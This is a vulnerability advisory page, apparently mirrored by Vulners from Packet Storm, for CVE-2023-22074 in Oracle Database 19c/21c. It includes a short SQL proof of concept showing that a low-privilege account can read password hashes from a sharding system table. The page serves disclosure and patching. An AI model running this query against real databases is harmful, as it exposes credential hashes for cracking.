Vulners
Lucene search
Oracle 19c / 21c Sharding Component Password Hash Exposure
🗓️ 26 Oct 2023 00:00:00Reported by Emad Al-MousaType 
packetstorm🔗 packetstormsecurity.com👁 452 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2023-22074 | 25 Oct 202315:31 | – | circl |
 | Oracle Database Server Security Vulnerability | 17 Oct 202300:00 | – | cnnvd |
 | CVE-2023-22074 | 17 Oct 202321:02 | – | cve |
 | CVE-2023-22074 | 17 Oct 202321:02 | – | cvelist |
 | EUVD-2023-26239 | 3 Oct 202520:07 | – | euvd |
 | Vulnerabilities fixed in Oracle Database Server | 19 Oct 202300:00 | – | ncsc |
 | CVE-2023-22074 | 17 Oct 202322:15 | – | nvd |
 | Oracle Critical Patch Update Advisory - October 2023 | 17 Oct 202300:00 | – | oracle |
 | Oracle Database Server (October 2023 CPU) | 20 Oct 202300:00 | – | nessus |
 | Buffer overflow | 17 Oct 202322:15 | – | prion |
10
`Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa
*****************************************
Vulnerability Details:
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.
*****************************************
Proof of Concept (PoC):
I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:
SQL> alter session set container=ORCLPDB1;
Session altered.
SQL> create user jim identified by jim123;
User created.
SQL> grant create session,select any dictionary to jim;
Grant succeeded.
I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:
sqlplus "jim/jim123"@ORCLPDB1
SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;
DDL_NUM PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
123 445
E494684108560FFEF1C17CDE72F36A1A
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Oct 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.12.4
EPSS0.00065